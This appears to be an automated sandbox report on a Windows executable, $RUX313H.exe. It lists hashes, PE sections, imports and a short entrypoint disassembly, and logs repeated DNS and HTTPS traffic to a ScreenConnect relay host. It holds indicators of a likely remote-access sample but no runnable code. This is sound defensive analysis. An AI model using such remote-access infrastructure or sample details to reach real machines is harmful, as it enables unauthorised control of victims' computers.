                                                                        Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.................t...*...................@..............................................@...........................P..d............................................................p......................................................CODE....,r.......t.................. ..`DATA.................x..............@...BSS..................|...................idata..d....P.......|..............@....tls.........`...........................rdata.......p......................@..P.reloc..............................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                        Entropy (8bit):7.184289235097817
                                                                        TrID:
                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.19%
                                                                        • Win32 Executable (generic) a (10002005/4) 49.15%
                                                                        • Win32 Executable Borland Delphi 6 (262906/60) 1.29%
                                                                        • Win32 EXE PECompact compressed (generic) (41571/9) 0.20%
                                                                        • Win32 Executable Delphi generic (14689/80) 0.07%
                                                                        File name:$RUX313H.exe
                                                                        File size:4193672
                                                                        MD5:08ea055b45225ec89643836bae3c0446
                                                                        SHA1:dad2ac19848eb8361e735323d4581e6a724d5b39
                                                                        SHA256:2abf676ca2b221ca6dd7bd11facf8d003dff541ad4d5618cb86b39e9bfdb906e
                                                                        SHA512:fc96d096979ce7184398fecfdf9665911b8b087879ddff4a27817225b8bd8c201fcc3cf1072f38a903ff962465a012975ac00f2d845583f874c047547d0dbc15
                                                                        SSDEEP:49152:gbegT0+TL3Z0Mi963PSuIiH7efPKJqqLGVgM/1n7CJGcU3UPXGuI8Ewj1gf:p316Q6efPuPLC1n7CQcmIG7u0
                                                                        File Content Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x4080e4
                                                                        Entrypoint Section:CODE
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:9f4693fc0c511135129493f2161d1e86

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        push ebp
                                                                        mov ebp, esp
                                                                        add esp, FFFFFFE0h
                                                                        xor eax, eax
                                                                        mov dword ptr [ebp-20h], eax
                                                                        mov dword ptr [ebp-18h], eax
                                                                        mov dword ptr [ebp-1Ch], eax
                                                                        mov dword ptr [ebp-14h], eax
                                                                        mov eax, 00408054h
                                                                        call 00007FD9A8D9DD07h
                                                                        xor eax, eax
                                                                        push ebp
                                                                        push 00408220h
                                                                        push dword ptr fs:[eax]
                                                                        mov dword ptr fs:[eax], esp
                                                                        mov eax, 004091A8h
                                                                        mov ecx, 0000000Bh
                                                                        mov edx, 0000000Bh
                                                                        call 00007FD9A8DA0E51h
                                                                        mov eax, 004091B4h
                                                                        mov ecx, 00000009h
                                                                        mov edx, 00000009h
                                                                        call 00007FD9A8DA0E3Dh
                                                                        mov eax, 004091C0h
                                                                        mov ecx, 00000003h
                                                                        mov edx, 00000003h
                                                                        call 00007FD9A8DA0E29h
                                                                        mov eax, 004091DCh
                                                                        mov ecx, 00000003h
                                                                        mov edx, 00000003h
                                                                        call 00007FD9A8DA0E15h
                                                                        mov eax, dword ptr [00409210h]
                                                                        mov ecx, 0000000Bh
                                                                        mov edx, 0000000Bh
                                                                        call 00007FD9A8DA0E01h
                                                                        call 00007FD9A8DA0E58h
                                                                        lea edx, dword ptr [ebp-14h]
                                                                        xor eax, eax
                                                                        call 00007FD9A8D9E742h
                                                                        mov eax, dword ptr [ebp-14h]
                                                                        call 00007FD9A8D9ECD6h
                                                                        cmp eax, 0000A200h
                                                                        jle 00007FD9A8DA1EF7h
                                                                        call 00007FD9A8DA13D6h
                                                                        call 00007FD9A8DA1BE9h
                                                                        mov eax, 004091C4h
                                                                        mov ecx, 00000003h
                                                                        mov edx, 00000003h

                                                                        Data Directories

                                                                        Name                                  Virtual Address  Virtual Size  Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT          0x15000          0x864         .idata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE        0x19000          0x1400        .rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC       0x18000          0x5cc         .reloc
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS             0x17000          0x18          .rdata
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT             0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

                                                                        Sections

                                                                        Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
                                                                        CODE    0x1000           0x722c        0x7400    False     0.617355872845   data       6.51167217489   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        DATA    0x9000           0x218         0x400     False     0.3623046875     data       3.15169834056   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        BSS     0xa000           0xa899        0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .idata  0x15000          0x864         0xa00     False     0.37421875       data       4.17385976895   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .tls    0x16000          0x8           0x0       False     0                empty      0.0             IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .rdata  0x17000          0x18          0x200     False     0.05078125       data       0.206920017787  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .reloc  0x18000          0x5cc         0x600     False     0.848307291667   data       6.44309346589   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
                                                                        .rsrc   0x19000          0x1400        0x1400    False     0.1302734375     data       1.29674401743   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        Name           RVA      Size    Type  Language  Country
                                                                        RT_ICON        0x19150  0x10a8  data  Russian   Russia
                                                                        RT_RCDATA      0x1a1f8  0x10    data
                                                                        RT_RCDATA      0x1a208  0xac    data
                                                                        RT_GROUP_ICON  0x1a2b4  0x14    data  Russian   Russia

                                                                        Imports

                                                                        DLL           Import
                                                                        kernel32.dll  DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, GetThreadLocale, GetStartupInfoA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
                                                                        user32.dll    GetKeyboardType, MessageBoxA
                                                                        advapi32.dll  RegQueryValueExA, RegOpenKeyExA, RegCloseKey
                                                                        oleaut32.dll  SysFreeString, SysReAllocStringLen
                                                                        kernel32.dll  TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
                                                                        advapi32.dll  RegSetValueExA, RegOpenKeyExA, RegCloseKey
                                                                        kernel32.dll  WriteFile, WinExec, SetFilePointer, SetFileAttributesA, SetEndOfFile, SetCurrentDirectoryA, ReleaseMutex, ReadFile, GetWindowsDirectoryA, GetTempPathA, GetShortPathNameA, GetModuleFileNameA, GetLogicalDriveStringsA, GetLocalTime, GetLastError, GetFileSize, GetFileAttributesA, GetDriveTypeA, GetCommandLineA, FreeLibrary, FindNextFileA, FindFirstFileA, FindClose, DeleteFileA, CreateMutexA, CreateFileA, CreateDirectoryA, CloseHandle
                                                                        gdi32.dll     StretchDIBits, SetDIBits, SelectObject, GetObjectA, GetDIBits, DeleteObject, DeleteDC, CreateSolidBrush, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, BitBlt
                                                                        user32.dll    ReleaseDC, GetSysColor, GetIconInfo, GetDC, FillRect, DestroyIcon, CopyImage, CharLowerBuffA
                                                                        shell32.dll   ShellExecuteA, ExtractIconA

                                                                        Possible Origin

                                                                        Language of compilation system  Country where language is spoken
                                                                        Russian                         Russia

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        Timestamp                 Protocol  SID  Message                                        Source Port  Dest Port  Source IP    Dest IP
                                                                        10/01/21-21:51:23.804183  ICMP      402  ICMP Destination Unreachable Port Unreachable                          192.168.2.1  192.168.2.4
                                                                        10/01/21-21:51:30.696205  ICMP      402  ICMP Destination Unreachable Port Unreachable                          192.168.2.1  192.168.2.4
                                                                        10/01/21-21:51:40.875575  ICMP      402  ICMP Destination Unreachable Port Unreachable                          192.168.2.1  192.168.2.4

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        Timestamp                            Source Port  Dest Port  Source IP       Dest IP
                                                                        Oct 1, 2021 21:51:39.199868917 CEST  49728        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:39.199908018 CEST  443          49728      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:39.199989080 CEST  49728        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:39.921807051 CEST  49728        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:39.921830893 CEST  443          49728      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:39.922003031 CEST  443          49728      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:40.366435051 CEST  49729        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:40.366483927 CEST  443          49729      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:40.366575003 CEST  49729        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:40.648279905 CEST  49729        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:40.648325920 CEST  443          49729      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:40.648425102 CEST  443          49729      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:43.291138887 CEST  49732        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:43.291187048 CEST  443          49732      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:43.292344093 CEST  49732        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:43.602549076 CEST  49732        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:43.602590084 CEST  443          49732      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:43.602746010 CEST  443          49732      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:47.659250021 CEST  49733        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:47.659311056 CEST  443          49733      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:47.659430981 CEST  49733        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:47.946603060 CEST  49733        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:47.946636915 CEST  443          49733      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:47.946777105 CEST  443          49733      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:54.428282976 CEST  49734        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:54.428348064 CEST  443          49734      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:54.428487062 CEST  49734        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:55.107616901 CEST  49734        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:51:55.107683897 CEST  443          49734      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:51:55.107810974 CEST  443          49734      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:52:04.614422083 CEST  49736        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:52:04.614456892 CEST  443          49736      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:52:04.614533901 CEST  49736        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:52:04.909526110 CEST  49736        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:52:04.909555912 CEST  443          49736      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:52:04.909663916 CEST  443          49736      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:52:19.880145073 CEST  49772        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:52:19.880202055 CEST  443          49772      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:52:19.880306005 CEST  49772        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:52:20.143433094 CEST  49772        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:52:20.143482924 CEST  443          49772      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:52:20.143646002 CEST  443          49772      145.40.105.136  192.168.2.4
                                                                        Oct 1, 2021 21:52:42.685518026 CEST  49806        443        192.168.2.4     145.40.105.136
                                                                        Oct 1, 2021 21:52:42.685563087 CEST44349806145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:42.685736895 CEST49806443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:43.046314001 CEST49806443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:52:43.046345949 CEST44349806145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:52:43.046416044 CEST44349806145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:53:16.828896046 CEST49811443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:53:16.828944921 CEST44349811145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:53:16.829081059 CEST49811443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:53:17.123565912 CEST49811443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:53:17.123605967 CEST44349811145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:53:17.123718023 CEST44349811145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:54:08.420073032 CEST49812443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:54:08.420125961 CEST44349812145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:54:08.420243025 CEST49812443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:54:08.607199907 CEST49812443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:54:08.607230902 CEST44349812145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:54:08.607424021 CEST44349812145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:55:25.051428080 CEST49813443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:55:25.051481009 CEST44349813145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:55:25.051614046 CEST49813443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:55:25.208882093 CEST49813443192.168.2.4145.40.105.136
                                                                        Oct 1, 2021 21:55:25.208918095 CEST44349813145.40.105.136192.168.2.4
                                                                        Oct 1, 2021 21:55:25.209008932 CEST44349813145.40.105.136192.168.2.4

                                                                        UDP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 1, 2021 21:51:23.804115057 CEST | 65299 | 274 | 192.168.2.4 | 192.168.2.1
Oct 1, 2021 21:51:30.696145058 CEST | 65299 | 274 | 192.168.2.4 | 192.168.2.1
Oct 1, 2021 21:51:39.173830032 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:51:39.189588070 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:51:40.349257946 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:51:40.363372087 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:51:40.875504017 CEST | 65299 | 274 | 192.168.2.4 | 192.168.2.1
Oct 1, 2021 21:51:43.203177929 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:51:43.216849089 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:51:43.272902966 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:51:43.288008928 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:51:47.643362045 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:51:47.657860041 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:51:54.412354946 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:51:54.426678896 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:02.843950987 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:02.857548952 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:04.599450111 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:04.613214016 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:09.137598991 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:09.215039015 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:10.192630053 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:10.228168011 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:10.629077911 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:10.642864943 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:11.649523973 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:11.732439041 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:12.228310108 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:12.242255926 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:13.195873976 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:13.319734097 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:14.824449062 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:14.839363098 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:16.981220961 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:17.067363024 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:19.601720095 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:19.614783049 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:19.861962080 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:19.878940105 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:21.307898998 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:21.323544025 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:21.900173903 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:21.914057970 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:23.929052114 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:23.951000929 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:52:42.670301914 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:52:42.683744907 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:53:02.352579117 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:53:02.382389069 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:53:04.205233097 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:53:04.218379974 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:53:16.809938908 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:53:16.825300932 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:54:08.403628111 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:54:08.418592930 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
Oct 1, 2021 21:55:25.025949955 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
Oct 1, 2021 21:55:25.048744917 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4

Note: the extraction fused the two port fields. For the DNS rows the split is unambiguous (one side is 53). For the three packets from 192.168.2.4 to the gateway 192.168.2.1 the fused value is 65299274; the 65299 / 274 split shown is an assumption, and the three ICMP "Port unreachable" replies below correspond to those three packets.

                                                                        ICMP Packets

Timestamp | Source IP | Dest IP | Checksum | Code | Type
Oct 1, 2021 21:51:23.804183006 CEST | 192.168.2.1 | 192.168.2.4 | 8344 | (Port unreachable) | Destination Unreachable
Oct 1, 2021 21:51:30.696204901 CEST | 192.168.2.1 | 192.168.2.4 | 832d | (Port unreachable) | Destination Unreachable
Oct 1, 2021 21:51:40.875575066 CEST | 192.168.2.1 | 192.168.2.4 | 836b | (Port unreachable) | Destination Unreachable

                                                                        DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Oct 1, 2021 21:51:39.173830032 CEST | 192.168.2.4 | 8.8.8.8 | 0xfc28 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:40.349257946 CEST | 192.168.2.4 | 8.8.8.8 | 0xa56 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:43.272902966 CEST | 192.168.2.4 | 8.8.8.8 | 0xb519 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:47.643362045 CEST | 192.168.2.4 | 8.8.8.8 | 0x7795 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:54.412354946 CEST | 192.168.2.4 | 8.8.8.8 | 0xa0b1 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:52:04.599450111 CEST | 192.168.2.4 | 8.8.8.8 | 0x2d4 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:52:19.861962080 CEST | 192.168.2.4 | 8.8.8.8 | 0x6acd | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:52:42.670301914 CEST | 192.168.2.4 | 8.8.8.8 | 0x82f8 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:53:16.809938908 CEST | 192.168.2.4 | 8.8.8.8 | 0x5b13 | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:54:08.403628111 CEST | 192.168.2.4 | 8.8.8.8 | 0x2bd | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)
Oct 1, 2021 21:55:25.025949955 CEST | 192.168.2.4 | 8.8.8.8 | 0x7e4f | Standard query (0) | instance-qchhoo-relay.screenconnect.com | A (IP address) | IN (0x0001)

                                                                        DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Oct 1, 2021 21:51:39.189588070 CEST | 8.8.8.8 | 192.168.2.4 | 0xfc28 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:51:39.189588070 CEST | 8.8.8.8 | 192.168.2.4 | 0xfc28 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:40.363372087 CEST | 8.8.8.8 | 192.168.2.4 | 0xa56 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:51:40.363372087 CEST | 8.8.8.8 | 192.168.2.4 | 0xa56 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:43.288008928 CEST | 8.8.8.8 | 192.168.2.4 | 0xb519 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:51:43.288008928 CEST | 8.8.8.8 | 192.168.2.4 | 0xb519 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:47.657860041 CEST | 8.8.8.8 | 192.168.2.4 | 0x7795 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:51:47.657860041 CEST | 8.8.8.8 | 192.168.2.4 | 0x7795 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:51:54.426678896 CEST | 8.8.8.8 | 192.168.2.4 | 0xa0b1 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:51:54.426678896 CEST | 8.8.8.8 | 192.168.2.4 | 0xa0b1 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:52:04.613214016 CEST | 8.8.8.8 | 192.168.2.4 | 0x2d4 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:52:04.613214016 CEST | 8.8.8.8 | 192.168.2.4 | 0x2d4 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:52:19.878940105 CEST | 8.8.8.8 | 192.168.2.4 | 0x6acd | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:52:19.878940105 CEST | 8.8.8.8 | 192.168.2.4 | 0x6acd | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:52:42.683744907 CEST | 8.8.8.8 | 192.168.2.4 | 0x82f8 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:52:42.683744907 CEST | 8.8.8.8 | 192.168.2.4 | 0x82f8 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
Oct 1, 2021 21:53:16.825300932 CEST | 8.8.8.8 | 192.168.2.4 | 0x5b13 | No error (0) | instance-qchhoo-relay.screenconnect.com | server-nixce85832f-relay.screenconnect.com | - | CNAME (Canonical name) | IN (0x0001)
Oct 1, 2021 21:53:16.825300932 CEST | 8.8.8.8 | 192.168.2.4 | 0x5b13 | No error (0) | server-nixce85832f-relay.screenconnect.com | - | 145.40.105.136 | A (IP address) | IN (0x0001)
